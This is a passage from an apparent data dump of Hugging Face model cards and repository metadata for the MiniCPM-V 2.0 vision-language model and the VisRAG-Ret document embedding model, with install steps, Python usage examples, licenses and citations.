MiniCPM-V 2.0 can be **efficiently deployed on most GPU cards and personal computers**, and **even on end devices such as mobile phones**. For visual encoding, we compress the image representations into much fewer tokens via a perceiver resampler. This allows MiniCPM-V 2.0 to operate with **favorable memory cost and speed during inference even when dealing with high-resolution images**.
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
|
| 49 |
+
- 🙌 **Bilingual Support.**
|
| 50 |
+
|
| 51 |
+
MiniCPM-V 2.0 **supports strong bilingual multimodal capabilities in both English and Chinese**. This is enabled by generalizing multimodal capabilities across languages, a technique from [VisCPM](https://arxiv.org/abs/2308.12038) [ICLR'24].
|
| 52 |
+
|
| 53 |
+
## Evaluation <!-- omit in toc -->
|
| 54 |
+
|
| 55 |
+
<div align=""center"">
|
| 56 |
+
<img src=/openbmb/MiniCPM-V-2.0/resolve/main/assets/minicpmv-2-peformance2.png width=100% />
|
| 57 |
+
</div>
|
| 58 |
+
Results on TextVQA, DocVQA, OCRBench, OpenCompass, MME, MMBench, MMMU, MathVista, LLaVA Bench, Object HalBench.
|
| 59 |
+
<div align=""center"">
|
| 60 |
+
<img src=/openbmb/MiniCPM-V-2.0/resolve/main/assets/minicpmv-2-benchmark.png width=140% />
|
| 61 |
+
</div>
|
| 62 |
+
|
| 63 |
+
|
| 64 |
+
## Examples <!-- omit in toc -->
|
| 65 |
+
|
| 66 |
+
<table align=""center"">
|
| 67 |
+
<p align=""center"">
|
| 68 |
+
<img src=""assets/minicpmv2-cases_2.png"" width=95%/>
|
| 69 |
+
</p>
|
| 70 |
+
</table>
|
| 71 |
+
|
| 72 |
+
We deploy MiniCPM-V 2.0 on end devices. The demo video is the raw screen recording on a Xiaomi 14 Pro without edition.
|
| 73 |
+
|
| 74 |
+
<table align=""center"">
|
| 75 |
+
<p align=""center"">
|
| 76 |
+
<img src=""assets/station.gif"" width=40% style=""display:inline-block;""/>
|
| 77 |
+
<img src=""assets/london_car.gif"" width=40% style=""display:inline-block;""/>
|
| 78 |
+
</p>
|
| 79 |
+
</table>
|
| 80 |
+
|
| 81 |
+
|
| 82 |
+
|
| 83 |
+
|
| 84 |
+
## Demo
|
| 85 |
+
Click here to try out the Demo of [MiniCPM-V 2.0](https://huggingface.co/spaces/openbmb/MiniCPM-V-2).
|
| 86 |
+
|
| 87 |
+
## Deployment on Mobile Phone
|
| 88 |
+
MiniCPM-V 2.0 can be deployed on mobile phones with Android and Harmony operating systems. 🚀 Try it out [here](https://github.com/OpenBMB/mlc-MiniCPM).
|
| 89 |
+
|
| 90 |
+
## Inference with vLLM<a id=""vllm""></a>
|
| 91 |
+
|
| 92 |
+
<details>
|
| 93 |
+
<summary>Click to see how to inference with vLLM </summary>
|
| 94 |
+
Because our pull request to vLLM is still waiting for reviewing, we fork this repository to build and test our vLLM demo. Here are the steps:
|
| 95 |
+
|
| 96 |
+
1. Clone our version of vLLM:
|
| 97 |
+
```shell
|
| 98 |
+
git clone https://github.com/OpenBMB/vllm.git
|
| 99 |
+
```
|
| 100 |
+
2. Install vLLM:
|
| 101 |
+
```shell
|
| 102 |
+
cd vllm
|
| 103 |
+
pip install -e .
|
| 104 |
+
```
|
| 105 |
+
3. Install timm:
|
| 106 |
+
```shell
|
| 107 |
+
pip install timm=0.9.10
|
| 108 |
+
```
|
| 109 |
+
4. Run our demo:
|
| 110 |
+
```shell
|
| 111 |
+
python examples/minicpmv_example.py
|
| 112 |
+
```
|
| 113 |
+
</details>
|
| 114 |
+
|
| 115 |
+
|
| 116 |
+
## Usage
|
| 117 |
+
Inference using Huggingface transformers on Nivdia GPUs or Mac with MPS (Apple silicon or AMD GPUs). Requirements tested on python 3.10:
|
| 118 |
+
```
|
| 119 |
+
Pillow==10.1.0
|
| 120 |
+
timm==0.9.10
|
| 121 |
+
torch==2.1.2
|
| 122 |
+
torchvision==0.16.2
|
| 123 |
+
transformers==4.36.0
|
| 124 |
+
sentencepiece==0.1.99
|
| 125 |
+
```
|
| 126 |
+
|
| 127 |
+
```python
|
| 128 |
+
# test.py
|
| 129 |
+
import torch
|
| 130 |
+
from PIL import Image
|
| 131 |
+
from transformers import AutoModel, AutoTokenizer
|
| 132 |
+
|
| 133 |
+
model = AutoModel.from_pretrained('openbmb/MiniCPM-V-2', trust_remote_code=True, torch_dtype=torch.bfloat16)
|
| 134 |
+
# For Nvidia GPUs support BF16 (like A100, H100, RTX3090)
|
| 135 |
+
model = model.to(device='cuda', dtype=torch.bfloat16)
|
| 136 |
+
# For Nvidia GPUs do NOT support BF16 (like V100, T4, RTX2080)
|
| 137 |
+
#model = model.to(device='cuda', dtype=torch.float16)
|
| 138 |
+
# For Mac with MPS (Apple silicon or AMD GPUs).
|
| 139 |
+
# Run with `PYTORCH_ENABLE_MPS_FALLBACK=1 python test.py`
|
| 140 |
+
#model = model.to(device='mps', dtype=torch.float16)
|
| 141 |
+
|
| 142 |
+
tokenizer = AutoTokenizer.from_pretrained('openbmb/MiniCPM-V-2', trust_remote_code=True)
|
| 143 |
+
model.eval()
|
| 144 |
+
|
| 145 |
+
image = Image.open('xx.jpg').convert('RGB')
|
| 146 |
+
question = 'What is in the image?'
|
| 147 |
+
msgs = [{'role': 'user', 'content': question}]
|
| 148 |
+
|
| 149 |
+
res, context, _ = model.chat(
|
| 150 |
+
image=image,
|
| 151 |
+
msgs=msgs,
|
| 152 |
+
context=None,
|
| 153 |
+
tokenizer=tokenizer,
|
| 154 |
+
sampling=True,
|
| 155 |
+
temperature=0.7
|
| 156 |
+
)
|
| 157 |
+
print(res)
|
| 158 |
+
```
|
| 159 |
+
|
| 160 |
+
Please look at [GitHub](https://github.com/OpenBMB/MiniCPM-V) for more detail about usage.
|
| 161 |
+
|
| 162 |
+
|
| 163 |
+
## MiniCPM-V 1.0 <!-- omit in toc -->
|
| 164 |
+
Please see the info about MiniCPM-V 1.0 [here](https://huggingface.co/openbmb/MiniCPM-V).
|
| 165 |
+
|
| 166 |
+
## License
|
| 167 |
+
#### Model License
|
| 168 |
+
* The code in this repo is released under the [Apache-2.0](https://github.com/OpenBMB/MiniCPM/blob/main/LICENSE) License.
|
| 169 |
+
* The usage of MiniCPM-V series model weights must strictly follow [MiniCPM Model License.md](https://github.com/OpenBMB/MiniCPM/blob/main/MiniCPM%20Model%20License.md).
|
| 170 |
+
* The models and weights of MiniCPM are completely free for academic research. after filling out a [""questionnaire""](https://modelbest.feishu.cn/share/base/form/shrcnpV5ZT9EJ6xYjh3Kx0J6v8g) for registration, are also available for free commercial use.
|
| 171 |
+
|
| 172 |
+
|
| 173 |
+
#### Statement
|
| 174 |
+
* As a LLM, MiniCPM-V 2.0 generates contents by learning a large mount of texts, but it cannot comprehend, express personal opinions or make value judgement. Anything generated by MiniCPM-V 2.0 does not represent the views and positions of the model developers
|
| 175 |
+
* We will not be liable for any problems arising from the use of the MinCPM-V open Source model, including but not limited to data security issues, risk of public opinion, or any risks and problems arising from the misdirection, misuse, dissemination or misuse of the model.
|
| 176 |
+
|
| 177 |
+
## Other Multimodal Projects from Our Team
|
| 178 |
+
|
| 179 |
+
[VisCPM](https://github.com/OpenBMB/VisCPM/tree/main) | [RLHF-V](https://github.com/RLHF-V/RLHF-V) | [LLaVA-UHD](https://github.com/thunlp/LLaVA-UHD)
|
| 180 |
+
|
| 181 |
+
## Citation
|
| 182 |
+
|
| 183 |
+
If you find our work helpful, please consider citing the following papers
|
| 184 |
+
|
| 185 |
+
```bib
|
| 186 |
+
@article{yu2023rlhf,
|
| 187 |
+
title={Rlhf-v: Towards trustworthy mllms via behavior alignment from fine-grained correctional human feedback},
|
| 188 |
+
author={Yu, Tianyu and Yao, Yuan and Zhang, Haoye and He, Taiwen and Han, Yifeng and Cui, Ganqu and Hu, Jinyi and Liu, Zhiyuan and Zheng, Hai-Tao and Sun, Maosong and others},
|
| 189 |
+
journal={arXiv preprint arXiv:2312.00849},
|
| 190 |
+
year={2023}
|
| 191 |
+
}
|
| 192 |
+
@article{viscpm,
|
| 193 |
+
title={Large Multilingual Models Pivot Zero-Shot Multimodal Learning across Languages},
|
| 194 |
+
author={Jinyi Hu and Yuan Yao and Chongyi Wang and Shan Wang and Yinxu Pan and Qianyu Chen and Tianyu Yu and Hanghao Wu and Yue Zhao and Haoye Zhang and Xu Han and Yankai Lin and Jiao Xue and Dahai Li and Zhiyuan Liu and Maosong Sun},
|
| 195 |
+
journal={arXiv preprint arXiv:2308.12038},
|
| 196 |
+
year={2023}
|
| 197 |
+
}
|
| 198 |
+
@article{xu2024llava-uhd,
|
| 199 |
+
title={{LLaVA-UHD}: an LMM Perceiving Any Aspect Ratio and High-Resolution Images},
|
| 200 |
+
author={Xu, Ruyi and Yao, Yuan and Guo, Zonghao and Cui, Junbo and Ni, Zanlin and Ge, Chunjiang and Chua, Tat-Seng and Liu, Zhiyuan and Huang, Gao},
|
| 201 |
+
journal={arXiv preprint arXiv:2403.11703},
|
| 202 |
+
year={2024}
|
| 203 |
+
}
|
| 204 |
+
@article{yao2024minicpmvgpt4vlevelmllm,
|
| 205 |
+
title={MiniCPM-V: A GPT-4V Level MLLM on Your Phone},
|
| 206 |
+
author={Yao, Yuan and Yu, Tianyu and Zhang, Ao and Wang, Chongyi and Cui, Junbo and Zhu, Hongji and Cai, Tianchi and Li, Haoyu and Zhao, Weilin and He, Zhihui and Chen, Qianyu and Zhou, Huarong and Zou, Zhensheng and Zhang, Haoye and Hu, Shengding and Zheng, Zhi and Zhou, Jie and Cai, Jie and Han, Xu and Zeng, Guoyang and Li, Dahai and Liu, Zhiyuan and Sun, Maosong},
|
| 207 |
+
journal={arXiv preprint arXiv:2408.01800},
|
| 208 |
+
year={2024},
|
| 209 |
+
url={https://arxiv.org/abs/2408.01800},
|
| 210 |
+
}
|
| 211 |
+
```","{""id"": ""openbmb/MiniCPM-V-2"", ""author"": ""openbmb"", ""sha"": ""b9a02dbfcc87e471b13f8d1c6963747db31427db"", ""last_modified"": ""2025-01-15 10:35:33+00:00"", ""created_at"": ""2024-04-09 11:20:33+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 10386, ""downloads_all_time"": null, ""likes"": 461, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""safetensors"", ""minicpmv"", ""feature-extraction"", ""visual-question-answering"", ""custom_code"", ""en"", ""zh"", ""dataset:HaoyeZhang/RLHF-V-Dataset"", ""dataset:Yirany/UniMM-Chat"", ""dataset:HuggingFaceM4/VQAv2"", ""dataset:liuhaotian/LLaVA-Instruct-150K"", ""arxiv:2403.11703"", ""arxiv:2308.12038"", ""arxiv:2312.00849"", ""arxiv:2408.01800"", ""region:us""], ""pipeline_tag"": ""visual-question-answering"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- HaoyeZhang/RLHF-V-Dataset\n- Yirany/UniMM-Chat\n- HuggingFaceM4/VQAv2\n- liuhaotian/LLaVA-Instruct-150K\nlanguage:\n- en\n- zh\npipeline_tag: visual-question-answering"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""MiniCPMV""], ""auto_map"": {""AutoConfig"": ""configuration_minicpm.MiniCPMVConfig"", ""AutoModel"": ""modeling_minicpmv.MiniCPMV"", ""AutoModelForCausalLM"": ""modeling_minicpmv.MiniCPMV""}, ""model_type"": ""minicpmv"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/english_menu.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/london_car.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/minicpmv-2-benchmark.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/minicpmv-2-peformance2.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/minicpmv2-cases_2.png', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='assets/station.gif', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='generation_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpmv.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='resampler.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": [""bokesyo/MiniCPM_Visual_Document_Retriever_Demo"", ""ashika00/Farmers-Hub"", ""Demo750/XGBoost_Gaze"", ""Mister56/VQA_app"", ""darkstar94/MiniCPM-V-2"", ""AhmedAlmaghz/github-repo-test"", ""VanguardAI/MultiModal_OpenSource_AI"", ""Faustrix/SodokuSolver"", ""yehtutmaung/Story_and_Music_Generator_from_Image""], ""safetensors"": {""parameters"": {""BF16"": 3434965792}, ""total"": 3434965792}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-01-15 10:35:33+00:00"", ""cardData"": ""datasets:\n- HaoyeZhang/RLHF-V-Dataset\n- Yirany/UniMM-Chat\n- HuggingFaceM4/VQAv2\n- liuhaotian/LLaVA-Instruct-150K\nlanguage:\n- en\n- zh\npipeline_tag: visual-question-answering"", ""transformersInfo"": {""auto_model"": ""AutoModel"", ""custom_class"": ""modeling_minicpmv.MiniCPMV"", ""pipeline_tag"": ""feature-extraction"", ""processor"": null}, ""_id"": ""661524817880b7466a45276c"", ""modelId"": ""openbmb/MiniCPM-V-2"", ""usedStorage"": 6919753277}",0,https://huggingface.co/openbmb/VisRAG-Ret,1,,0,,0,,0,"AhmedAlmaghz/github-repo-test, Demo750/XGBoost_Gaze, Faustrix/SodokuSolver, Mister56/VQA_app, VanguardAI/MultiModal_OpenSource_AI, ashika00/Farmers-Hub, bokesyo/MiniCPM_Visual_Document_Retriever_Demo, darkstar94/MiniCPM-V-2, huggingface/InferenceSupport/discussions/new?title=openbmb/MiniCPM-V-2&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Bopenbmb%2FMiniCPM-V-2%5D(%2Fopenbmb%2FMiniCPM-V-2)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, openbmb/MiniCPM-V-2, yehtutmaung/Story_and_Music_Generator_from_Image",11
|
| 212 |
+
openbmb/VisRAG-Ret,"---
|
| 213 |
+
license: apache-2.0
|
| 214 |
+
datasets:
|
| 215 |
+
- openbmb/VisRAG-Ret-Train-In-domain-data
|
| 216 |
+
- openbmb/VisRAG-Ret-Train-Synthetic-data
|
| 217 |
+
language:
|
| 218 |
+
- en
|
| 219 |
+
base_model:
|
| 220 |
+
- openbmb/MiniCPM-V-2
|
| 221 |
+
tags:
|
| 222 |
+
- VisRAG
|
| 223 |
+
pipeline_tag: feature-extraction
|
| 224 |
+
---
|
| 225 |
+
# VisRAG: Vision-based Retrieval-augmented Generation on Multi-modality Documents
|
| 226 |
+
<div style=""display: flex; align-items: center;"">
|
| 227 |
+
<a href=""https://huggingface.co/openbmb/VisRAG-Ret"" style=""margin-right: 10px;"">
|
| 228 |
+
<img src=""https://img.shields.io/badge/VisRAG_Ret-fcd022?style=for-the-badge&logo=huggingface&logoColor=000"" alt=""VisRAG Ret"">
|
| 229 |
+
</a>
|
| 230 |
+
<a href=""https://huggingface.co/collections/openbmb/visrag-6717bbfb471bb018a49f1c69"" style=""margin-right: 10px;"">
|
| 231 |
+
<img src=""https://img.shields.io/badge/VisRAG_Collection-fcd022?style=for-the-badge&logo=huggingface&logoColor=000"" alt=""VisRAG Collection"">
|
| 232 |
+
</a>
|
| 233 |
+
<a href=""https://huggingface.co/spaces/tcy6/VisRAG_Pipeline"" style=""margin-right: 10px;"">
|
| 234 |
+
<img src=""https://img.shields.io/badge/VisRAG_Pipeline-fcd022?style=for-the-badge&logo=huggingface&logoColor=000"" alt=""VisRAG Pipeline"">
|
| 235 |
+
</a>
|
| 236 |
+
<a href=""https://arxiv.org/abs/2410.10594"" style=""margin-right: 10px;"">
|
| 237 |
+
<img src=""https://img.shields.io/badge/arXiv-2410.10594-ff0000.svg?style=for-the-badge"" alt=""arXiv"">
|
| 238 |
+
</a>
|
| 239 |
+
<a href=""https://colab.research.google.com/drive/11KV9adDNXPfHiuFAfXNOvtYJKcyR8JZH?usp=sharing"" style=""margin-right: 10px;"">
|
| 240 |
+
<img src=""https://img.shields.io/badge/VisRAG_Pipeline-ffffff?style=for-the-badge&logo=googlecolab&logoColor=f9ab00"" alt=""Google Colab"">
|
| 241 |
+
</a>
|
| 242 |
+
<a href=""https://github.com/openbmb/VisRAG"" style=""margin-right: 10px;"">
|
| 243 |
+
<img src=""https://img.shields.io/badge/VisRAG-000000?style=for-the-badge&logo=github&logoColor=white"" alt=""GitHub"">
|
| 244 |
+
</a>
|
| 245 |
+
</div>
|
| 246 |
+
|
| 247 |
+
<p align=""center"">•
|
| 248 |
+
<a href=""#📖-introduction""> 📖 Introduction </a> •
|
| 249 |
+
<a href=""#🎉-news"">🎉 News</a> •
|
| 250 |
+
<a href=""#✨-visrag-pipeline"">✨ VisRAG Pipeline</a> •
|
| 251 |
+
<a href=""#⚡️-training"">⚡️ Training</a>
|
| 252 |
+
</p>
|
| 253 |
+
<p align=""center"">•
|
| 254 |
+
<a href=""#📦-requirements"">📦 Requirements</a> •
|
| 255 |
+
<a href=""#🔧-usage"">🔧 Usage</a> •
|
| 256 |
+
<a href=""#📄-license"">📄 Lisense</a> •
|
| 257 |
+
<a href=""#📑-citation"">📑 Citation</a> •
|
| 258 |
+
<a href=""#📧-contact"">📧 Contact</a>
|
| 259 |
+
</p>
|
| 260 |
+
|
| 261 |
+
# 📖 Introduction
|
| 262 |
+
**VisRAG** is a novel vision-language model (VLM)-based RAG pipeline. In this pipeline, instead of first parsing the document to obtain text, the document is directly embedded using a VLM as an image and then retrieved to enhance the generation of a VLM.Compared to traditional text-based RAG, **VisRAG** maximizes the retention and utilization of the data information in the original documents, eliminating the information loss introduced during the parsing process.
|
| 263 |
+
<p align=""center""><img width=800 src=""https://github.com/openbmb/VisRAG/blob/master/assets/main_figure.png?raw=true""/></p>
|
| 264 |
+
|
| 265 |
+
# 🎉 News
|
| 266 |
+
|
| 267 |
+
* 20241104: Released our [VisRAG Pipeline](https://huggingface.co/spaces/tcy6/VisRAG_Pipeline) on Hugging Face Space.
|
| 268 |
+
* 20241031: Released our [VisRAG Pipeline](https://colab.research.google.com/drive/11KV9adDNXPfHiuFAfXNOvtYJKcyR8JZH?usp=sharing) on Colab.
|
| 269 |
+
* 20241015: Released our train data and test data on Hugging Face which can be found in the [VisRAG](https://huggingface.co/collections/openbmb/visrag-6717bbfb471bb018a49f1c69) Collection on Hugging Face. It is referenced at the beginning of this page.
|
| 270 |
+
* 20241014: Released our [Paper](https://arxiv.org/abs/2410.10594) on arXiv. Released our [Model](https://huggingface.co/openbmb/VisRAG-Ret) on Hugging Face. Released our [Code](https://github.com/OpenBMB/VisRAG) on GitHub.
|
| 271 |
+
|
| 272 |
+
# ✨ VisRAG Pipeline
|
| 273 |
+
|
| 274 |
+
## VisRAG-Ret
|
| 275 |
+
**VisRAG-Ret** is a document embedding model built on [MiniCPM-V 2.0](https://huggingface.co/openbmb/MiniCPM-V-2), a vision-language model that integrates [SigLIP](https://huggingface.co/google/siglip-so400m-patch14-384) as the vision encoder and [MiniCPM-2B](https://huggingface.co/openbmb/MiniCPM-2B-sft-bf16) as the language model.
|
| 276 |
+
|
| 277 |
+
## VisRAG-Gen
|
| 278 |
+
In the paper, We use MiniCPM-V 2.0, MiniCPM-V 2.6 and GPT-4o as the generators. Actually you can use any VLMs you like!
|
| 279 |
+
|
| 280 |
+
# ⚡️ Training
|
| 281 |
+
|
| 282 |
+
## VisRAG-Ret
|
| 283 |
+
Our training dataset of 362,110 Query-Document (Q-D) Pairs for **VisRAG-Ret** is comprised of train sets of openly available academic datasets (34%) and a synthetic dataset made up of pages from web-crawled PDF documents and augmented with VLM-generated (GPT-4o) pseudo-queries (66%). It can be found in the `VisRAG` Collection on Hugging Face, which is referenced at the beginning of this page.
|
| 284 |
+
|
| 285 |
+
|
| 286 |
+
## VisRAG-Gen
|
| 287 |
+
The generation part does not use any fine-tuning; we directly use off-the-shelf LLMs/VLMs for generation.
|
| 288 |
+
|
| 289 |
+
# 📦 Requirements
|
| 290 |
+
```
|
| 291 |
+
torch==2.1.2
|
| 292 |
+
torchvision==0.16.2
|
| 293 |
+
transformers==4.40.2
|
| 294 |
+
sentencepiece==0.1.99
|
| 295 |
+
decord==0.6.0
|
| 296 |
+
Pillow==10.1.0
|
| 297 |
+
```
|
| 298 |
+
|
| 299 |
+
# 🔧 Usage
|
| 300 |
+
|
| 301 |
+
## VisRAG-Ret
|
| 302 |
+
```python
|
| 303 |
+
from transformers import AutoModel, AutoTokenizer
|
| 304 |
+
import torch
|
| 305 |
+
import torch.nn.functional as F
|
| 306 |
+
from PIL import Image
|
| 307 |
+
import requests
|
| 308 |
+
from io import BytesIO
|
| 309 |
+
|
| 310 |
+
def weighted_mean_pooling(hidden, attention_mask):
|
| 311 |
+
attention_mask_ = attention_mask * attention_mask.cumsum(dim=1)
|
| 312 |
+
s = torch.sum(hidden * attention_mask_.unsqueeze(-1).float(), dim=1)
|
| 313 |
+
d = attention_mask_.sum(dim=1, keepdim=True).float()
|
| 314 |
+
reps = s / d
|
| 315 |
+
return reps
|
| 316 |
+
|
| 317 |
+
@torch.no_grad()
|
| 318 |
+
def encode(text_or_image_list):
|
| 319 |
+
|
| 320 |
+
if (isinstance(text_or_image_list[0], str)):
|
| 321 |
+
inputs = {
|
| 322 |
+
""text"": text_or_image_list,
|
| 323 |
+
'image': [None] * len(text_or_image_list),
|
| 324 |
+
'tokenizer': tokenizer
|
| 325 |
+
}
|
| 326 |
+
else:
|
| 327 |
+
inputs = {
|
| 328 |
+
""text"": [''] * len(text_or_image_list),
|
| 329 |
+
'image': text_or_image_list,
|
| 330 |
+
'tokenizer': tokenizer
|
| 331 |
+
}
|
| 332 |
+
outputs = model(**inputs)
|
| 333 |
+
attention_mask = outputs.attention_mask
|
| 334 |
+
hidden = outputs.last_hidden_state
|
| 335 |
+
|
| 336 |
+
reps = weighted_mean_pooling(hidden, attention_mask)
|
| 337 |
+
embeddings = F.normalize(reps, p=2, dim=1).detach().cpu().numpy()
|
| 338 |
+
return embeddings
|
| 339 |
+
|
| 340 |
+
model_name_or_path = ""openbmb/VisRAG-Ret""
|
| 341 |
+
tokenizer = AutoTokenizer.from_pretrained(model_name_or_path, trust_remote_code=True)
|
| 342 |
+
model = AutoModel.from_pretrained(model_name_or_path, torch_dtype=torch.bfloat16, trust_remote_code=True).cuda()
|
| 343 |
+
model.eval()
|
| 344 |
+
|
| 345 |
+
queries = [""What does a dog look like?""]
|
| 346 |
+
INSTRUCTION = ""Represent this query for retrieving relevant documents: ""
|
| 347 |
+
queries = [INSTRUCTION + query for query in queries]
|
| 348 |
+
|
| 349 |
+
print(""Downloading images..."")
|
| 350 |
+
passages = [
|
| 351 |
+
Image.open(BytesIO(requests.get(
|
| 352 |
+
'https://github.com/OpenBMB/VisRAG/raw/refs/heads/master/scripts/demo/retriever/test_image/cat.jpeg'
|
| 353 |
+
).content)).convert('RGB'),
|
| 354 |
+
Image.open(BytesIO(requests.get(
|
| 355 |
+
'https://github.com/OpenBMB/VisRAG/raw/refs/heads/master/scripts/demo/retriever/test_image/dog.jpg'
|
| 356 |
+
).content)).convert('RGB')
|
| 357 |
+
]
|
| 358 |
+
print(""Images downloaded."")
|
| 359 |
+
|
| 360 |
+
embeddings_query = encode(queries)
|
| 361 |
+
embeddings_doc = encode(passages)
|
| 362 |
+
|
| 363 |
+
scores = (embeddings_query @ embeddings_doc.T)
|
| 364 |
+
print(scores.tolist())
|
| 365 |
+
```
|
| 366 |
+
|
| 367 |
+
# 📄 License
|
| 368 |
+
|
| 369 |
+
* The code in this repo is released under the [Apache-2.0](https://github.com/OpenBMB/MiniCPM/blob/main/LICENSE) License.
|
| 370 |
+
* The usage of **VisRAG-Ret** model weights must strictly follow [MiniCPM Model License.md](https://github.com/OpenBMB/MiniCPM/blob/main/MiniCPM%20Model%20License.md).
|
| 371 |
+
* The models and weights of **VisRAG-Ret** are completely free for academic research. After filling out a [""questionnaire""](https://modelbest.feishu.cn/share/base/form/shrcnpV5ZT9EJ6xYjh3Kx0J6v8g) for registration, **VisRAG-Ret** weights are also available for free commercial use.
|
| 372 |
+
|
| 373 |
+
# 📑 Citation
|
| 374 |
+
|
| 375 |
+
```
|
| 376 |
+
@misc{yu2024visragvisionbasedretrievalaugmentedgeneration,
|
| 377 |
+
title={VisRAG: Vision-based Retrieval-augmented Generation on Multi-modality Documents},
|
| 378 |
+
author={Shi Yu and Chaoyue Tang and Bokai Xu and Junbo Cui and Junhao Ran and Yukun Yan and Zhenghao Liu and Shuo Wang and Xu Han and Zhiyuan Liu and Maosong Sun},
|
| 379 |
+
year={2024},
|
| 380 |
+
eprint={2410.10594},
|
| 381 |
+
archivePrefix={arXiv},
|
| 382 |
+
primaryClass={cs.IR},
|
| 383 |
+
url={https://arxiv.org/abs/2410.10594},
|
| 384 |
+
}
|
| 385 |
+
```
|
| 386 |
+
|
| 387 |
+
# 📧 Contact
|
| 388 |
+
|
| 389 |
+
- Shi Yu: yus21@mails.tsinghua.edu.cn
|
| 390 |
+
- Chaoyue Tang: tcy006@gmail.com","{""id"": ""openbmb/VisRAG-Ret"", ""author"": ""openbmb"", ""sha"": ""95ef596df871b606167cb7e4b7215caf1bfdf761"", ""last_modified"": ""2024-11-04 13:12:45+00:00"", ""created_at"": ""2024-10-14 18:36:55+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 1433, ""downloads_all_time"": null, ""likes"": 65, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""safetensors"", ""minicpmv"", ""VisRAG"", ""feature-extraction"", ""custom_code"", ""en"", ""dataset:openbmb/VisRAG-Ret-Train-In-domain-data"", ""dataset:openbmb/VisRAG-Ret-Train-Synthetic-data"", ""arxiv:2410.10594"", ""base_model:openbmb/MiniCPM-V-2"", ""base_model:finetune:openbmb/MiniCPM-V-2"", ""license:apache-2.0"", ""region:us""], ""pipeline_tag"": ""feature-extraction"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model:\n- openbmb/MiniCPM-V-2\ndatasets:\n- openbmb/VisRAG-Ret-Train-In-domain-data\n- openbmb/VisRAG-Ret-Train-Synthetic-data\nlanguage:\n- en\nlicense: apache-2.0\npipeline_tag: feature-extraction\ntags:\n- VisRAG"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""VisRAG_Ret""], ""auto_map"": {""AutoConfig"": ""configuration_minicpm.MiniCPMVConfig"", ""AutoModel"": ""modeling_visrag_ret.VisRAG_Ret""}, ""model_type"": ""minicpmv"", ""tokenizer_config"": {""bos_token"": ""<s>"", ""eos_token"": ""</s>"", ""pad_token"": ""<unk>"", ""unk_token"": ""<unk>"", ""use_default_system_prompt"": false}}, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='configuration_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00001-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model-00002-of-00002.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors.index.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpm.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_minicpmv.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='modeling_visrag_ret.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='resampler.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.model', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.py', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)""], ""spaces"": 